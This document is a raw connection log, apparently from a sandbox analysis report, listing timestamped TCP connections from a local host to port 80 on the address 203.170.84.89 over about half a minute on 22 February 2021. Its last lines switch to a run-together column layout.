Feb 22, 2021 19:13:43.869123936 CET | 80 | 49792 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:43.869232893 CET | 49792 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:43.872009993 CET | 49792 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:44.207695007 CET | 80 | 49792 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:44.207918882 CET | 49792 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:44.542459965 CET | 80 | 49792 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:44.576299906 CET | 80 | 49792 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:44.576551914 CET | 80 | 49792 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:44.576628923 CET | 49792 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:44.578947067 CET | 49792 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:44.796436071 CET | 49793 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:44.917512894 CET | 80 | 49792 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:45.131869078 CET | 80 | 49793 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:45.132352114 CET | 49793 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:45.134991884 CET | 49793 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:45.470438957 CET | 80 | 49793 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:45.470527887 CET | 49793 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:45.805701971 CET | 80 | 49793 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:45.838083982 CET | 80 | 49793 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:45.838129044 CET | 80 | 49793 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:45.841618061 CET | 49793 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:45.841656923 CET | 49793 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:46.097471952 CET | 49794 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:46.177248001 CET | 80 | 49793 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:46.444108963 CET | 80 | 49794 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:46.445601940 CET | 49794 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:46.448703051 CET | 49794 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:46.794996977 CET | 80 | 49794 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:46.795232058 CET | 49794 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:47.141275883 CET | 80 | 49794 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:47.172113895 CET | 80 | 49794 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:47.172290087 CET | 80 | 49794 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:47.172524929 CET | 49794 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:47.176336050 CET | 49794 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:47.420962095 CET | 49795 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:47.522226095 CET | 80 | 49794 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:47.758186102 CET | 80 | 49795 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:47.758353949 CET | 49795 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:47.761298895 CET | 49795 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:48.098963022 CET | 80 | 49795 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:48.099041939 CET | 49795 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:48.436330080 CET | 80 | 49795 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:48.467871904 CET | 80 | 49795 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:48.467916012 CET | 80 | 49795 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:48.467976093 CET | 49795 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:48.468036890 CET | 49795 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:48.704180956 CET | 49796 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:48.805315018 CET | 80 | 49795 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:49.038976908 CET | 80 | 49796 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:49.040853024 CET | 49796 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:49.047257900 CET | 49796 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:49.382189035 CET | 80 | 49796 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:49.382508039 CET | 49796 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:49.717134953 CET | 80 | 49796 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:49.748456955 CET | 80 | 49796 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:49.748485088 CET | 80 | 49796 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:49.748615026 CET | 49796 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:49.748718023 CET | 49796 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:49.978683949 CET | 49797 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:50.086057901 CET | 80 | 49796 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:50.319796085 CET | 80 | 49797 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:50.320014000 CET | 49797 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:50.324886084 CET | 49797 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:50.663242102 CET | 80 | 49797 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:50.663357019 CET | 49797 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:51.001254082 CET | 80 | 49797 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:51.031461954 CET | 80 | 49797 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:51.031606913 CET | 49797 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:51.031799078 CET | 80 | 49797 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:51.031879902 CET | 49797 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:51.276801109 CET | 49798 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:51.369652987 CET | 80 | 49797 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:51.615041971 CET | 80 | 49798 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:51.615284920 CET | 49798 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:51.622675896 CET | 49798 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:51.960963011 CET | 80 | 49798 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:51.961210966 CET | 49798 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:52.299410105 CET | 80 | 49798 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:52.330063105 CET | 80 | 49798 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:52.330363035 CET | 80 | 49798 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:52.330385923 CET | 49798 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:52.330465078 CET | 49798 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:52.589252949 CET | 49799 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:52.671586990 CET | 80 | 49798 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:52.923830986 CET | 80 | 49799 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:52.923995972 CET | 49799 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:52.940188885 CET | 49799 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:53.276544094 CET | 80 | 49799 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:53.276652098 CET | 49799 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:53.613017082 CET | 80 | 49799 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:53.654052973 CET | 80 | 49799 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:53.654226065 CET | 49799 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:53.654251099 CET | 80 | 49799 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:53.654333115 CET | 49799 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:53.876693964 CET | 49800 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:53.988482952 CET | 80 | 49799 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:54.211711884 CET | 80 | 49800 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:54.213130951 CET | 49800 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:54.217315912 CET | 49800 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:54.553634882 CET | 80 | 49800 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:54.554219961 CET | 49800 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:54.888840914 CET | 80 | 49800 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:54.922338009 CET | 80 | 49800 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:54.922454119 CET | 49800 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:54.922511101 CET | 80 | 49800 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:54.922568083 CET | 49800 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:55.156162977 CET | 49804 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:55.257162094 CET | 80 | 49800 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:55.490911007 CET | 80 | 49804 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:55.491027117 CET | 49804 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:55.493777990 CET | 49804 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:55.828674078 CET | 80 | 49804 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:55.828850985 CET | 49804 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:56.163475990 CET | 80 | 49804 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:56.195640087 CET | 80 | 49804 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:56.195713043 CET | 80 | 49804 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:56.195776939 CET | 49804 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:56.197033882 CET | 49804 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:56.424488068 CET | 49805 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:56.530540943 CET | 80 | 49804 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:56.760215998 CET | 80 | 49805 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:56.760335922 CET | 49805 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:56.763031960 CET | 49805 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:57.097064972 CET | 80 | 49805 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:57.098416090 CET | 49805 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:57.434627056 CET | 80 | 49805 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:57.467051029 CET | 80 | 49805 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:57.467173100 CET | 49805 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:57.467500925 CET | 80 | 49805 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:57.467590094 CET | 49805 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:57.708933115 CET | 49811 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:57.800723076 CET | 80 | 49805 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:58.047174931 CET | 80 | 49811 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:58.047283888 CET | 49811 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:58.050741911 CET | 49811 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:58.390463114 CET | 80 | 49811 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:58.390557051 CET | 49811 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:58.728013039 CET | 80 | 49811 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:58.757900953 CET | 80 | 49811 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:58.758189917 CET | 49811 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:58.758214951 CET | 80 | 49811 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:58.758529902 CET | 49811 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:58.976737976 CET | 49812 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:59.097623110 CET | 80 | 49811 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:59.317632914 CET | 80 | 49812 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:59.318540096 CET | 49812 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:59.321820021 CET | 49812 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:13:59.664855957 CET | 80 | 49812 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:13:59.665541887 CET | 49812 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:00.002942085 CET | 80 | 49812 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:00.041541100 CET | 80 | 49812 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:00.041593075 CET | 80 | 49812 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:00.041712999 CET | 49812 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:00.041747093 CET | 49812 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:00.291079044 CET | 49813 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:00.379120111 CET | 80 | 49812 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:00.625814915 CET | 80 | 49813 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:00.629396915 CET | 49813 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:00.631942034 CET | 49813 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:00.968427896 CET | 80 | 49813 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:00.970818996 CET | 49813 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:01.304662943 CET | 80 | 49813 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:01.344598055 CET | 80 | 49813 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:01.344877958 CET | 80 | 49813 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:01.344877958 CET | 49813 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:01.344947100 CET | 49813 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:01.581593990 CET | 49814 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:01.680428982 CET | 80 | 49813 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:01.917135000 CET | 80 | 49814 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:01.917305946 CET | 49814 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:01.922836065 CET | 49814 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:02.257256031 CET | 80 | 49814 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:02.257450104 CET | 49814 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:02.591464996 CET | 80 | 49814 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:02.623399973 CET | 80 | 49814 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:02.623450041 CET | 80 | 49814 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:02.623632908 CET | 49814 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:02.623656988 CET | 49814 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:02.890727043 CET | 49815 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:02.957371950 CET | 80 | 49814 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:03.226814985 CET | 80 | 49815 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:03.227049112 CET | 49815 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:03.230295897 CET | 49815 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:03.564932108 CET | 80 | 49815 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:03.565103054 CET | 49815 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:03.899715900 CET | 80 | 49815 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:03.928021908 CET | 80 | 49815 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:03.928194046 CET | 49815 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:03.928421021 CET | 80 | 49815 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:03.928491116 CET | 49815 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:04.166305065 CET | 49816 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:04.262698889 CET | 80 | 49815 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:04.503792048 CET | 80 | 49816 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:04.505326986 CET | 49816 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:04.508068085 CET | 49816 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:04.845519066 CET | 80 | 49816 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:04.845724106 CET | 49816 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:05.182857990 CET | 80 | 49816 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:05.223133087 CET | 80 | 49816 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:05.223248959 CET | 49816 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:05.223402023 CET | 80 | 49816 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:05.223470926 CET | 49816 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:05.470774889 CET | 49817 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:05.562098026 CET | 80 | 49816 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:05.808561087 CET | 80 | 49817 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:05.808903933 CET | 49817 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:05.814223051 CET | 49817 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:06.153723955 CET | 80 | 49817 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:06.153937101 CET | 49817 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:06.492265940 CET | 80 | 49817 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:06.530955076 CET | 80 | 49817 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:06.531183004 CET | 80 | 49817 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:06.531367064 CET | 49817 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:06.531400919 CET | 49817 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:06.771215916 CET | 49818 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:06.869174957 CET | 80 | 49817 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:07.109533072 CET | 80 | 49818 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:07.109680891 CET | 49818 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:07.112781048 CET | 49818 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:07.451200008 CET | 80 | 49818 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:07.451307058 CET | 49818 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:07.789136887 CET | 80 | 49818 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:07.826639891 CET | 80 | 49818 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:07.826808929 CET | 49818 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:07.826984882 CET | 80 | 49818 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:07.827045918 CET | 49818 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:08.072906971 CET | 49819 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:08.166235924 CET | 80 | 49818 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:08.410173893 CET | 80 | 49819 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:08.410295963 CET | 49819 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:08.413652897 CET | 49819 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:08.749349117 CET | 80 | 49819 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:08.749602079 CET | 49819 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:09.085068941 CET | 80 | 49819 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:09.114203930 CET | 80 | 49819 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:09.114279032 CET | 80 | 49819 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:09.114362955 CET | 49819 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:09.114414930 CET | 49819 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:09.355540037 CET | 49820 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:09.448856115 CET | 80 | 49819 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:09.693408012 CET | 80 | 49820 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:09.693557024 CET | 49820 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:09.712193966 CET | 49820 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:10.049879074 CET | 80 | 49820 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:10.049978971 CET | 49820 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:10.391522884 CET | 80 | 49820 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:10.421947002 CET | 80 | 49820 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:10.422000885 CET | 80 | 49820 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:10.422168016 CET | 49820 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:10.422214031 CET | 49820 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:10.639776945 CET | 49821 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:10.761104107 CET | 80 | 49820 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:10.975539923 CET | 80 | 49821 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:10.975754976 CET | 49821 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:11.002002954 CET | 49821 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:11.337661028 CET | 80 | 49821 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:11.337898016 CET | 49821 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:11.674774885 CET | 80 | 49821 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:11.707024097 CET | 80 | 49821 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:11.707323074 CET | 80 | 49821 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:11.707391024 CET | 49821 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:11.707425117 CET | 49821 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:11.959961891 CET | 49822 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:12.042572975 CET | 80 | 49821 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:12.298293114 CET | 80 | 49822 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:12.298474073 CET | 49822 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:12.313270092 CET | 49822 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:12.653194904 CET | 80 | 49822 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:12.653307915 CET | 49822 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:12.993556976 CET | 80 | 49822 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:13.023763895 CET | 80 | 49822 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:13.023874044 CET | 80 | 49822 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:13.023891926 CET | 49822 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:13.023925066 CET | 49822 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:13.249608994 CET | 49823 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:13.361994028 CET | 80 | 49822 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:13.584155083 CET | 80 | 49823 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:13.584359884 CET | 49823 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:13.908883095 CET | 49823 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:14.244668007 CET | 80 | 49823 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:14.247961044 CET | 49823 | 80 | 192.168.2.4 | 203.170.84.89
Feb 22, 2021 19:14:14.582493067 CET | 80 | 49823 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:14.616005898 CET | 80 | 49823 | 203.170.84.89 | 192.168.2.4
Feb 22, 2021 19:14:14.616067886 CET | 80 | 49823 | 203.170.84.89 | 192.168.2.4
                                          Feb 22, 2021 19:14:14.616245985 CET4982380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:14.769469023 CET4982380192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:15.081182003 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:15.105243921 CET8049823203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:15.417537928 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:15.417752028 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:15.437535048 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:15.773372889 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:15.773653984 CET4982480192.168.2.4203.170.84.89
                                          Feb 22, 2021 19:14:16.108849049 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.140294075 CET8049824203.170.84.89192.168.2.4
                                          Feb 22, 2021 19:14:16.140433073 CET4982480192.168.2.4203.170.84.89
